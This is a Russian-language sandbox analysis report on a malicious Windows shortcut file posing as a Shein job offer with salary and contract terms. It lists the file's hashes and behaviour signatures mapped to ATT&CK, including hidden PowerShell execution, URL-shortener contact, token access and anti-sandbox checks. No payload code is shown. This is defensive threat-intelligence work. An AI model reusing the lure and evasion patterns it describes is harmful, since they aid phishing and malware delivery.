Managed XDR

c-users-user-appdata-l...ontract-terms.docx.lnk — отчёт о динамическом анализе вредоносного файла

Информация о файле

Имя файла
c-users-user-appdata-local-temp-u2tlk1sv.jny-shein_new_collection_lookbook-detailed-description-of-shein-project-salary-with-contract-terms.docx.lnk
Тип файла
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Sep 11 14:43:34 2025, mtime=Mon Oct 6 21:15:45 2025, atime=Thu Sep 11 14:43:35 2025, length=454656, window=hide
Размер файла
2.4 KB
Первое обнаружение
Последнее обнаружение

Окружение

w10/x64 en

Хеши

SHA1
5d6f92b157f2d78746c73b608f0c6ec1ba7d20cc
SHA256
5a1fad162181f961decd3cb56de98a99eadff3966420dbdc2a463fc5b7f17a25
MD5
a82f88bb88d5c814237bd5fb6fe6424b

Сигнатуры

Resource Development

T1608.005 contacts_url_shortener: Connects to url shortening services

Execution

T1059.001 suspicious_powershell: Creates suspicious powershell process
T1059.001 suspicious_process: Spawns a suspicious process

Privilege Escalation

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Defense Evasion

T1497.003 antisandbox_idletime: Detects Windows Idle Time to determine the uptime
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Discovery

T1497.003 antisandbox_idletime: Detects Windows Idle Time to determine the uptime
T1518 locates_browser: Attempts to identify where browsers are installed

Other

network_powershell: Powershell process network connection detected
creates_suspended_process: Creates suspended process
test_check_service: Starts services
suricata_alert: Malicious traffic detected
yara_rules: Static rules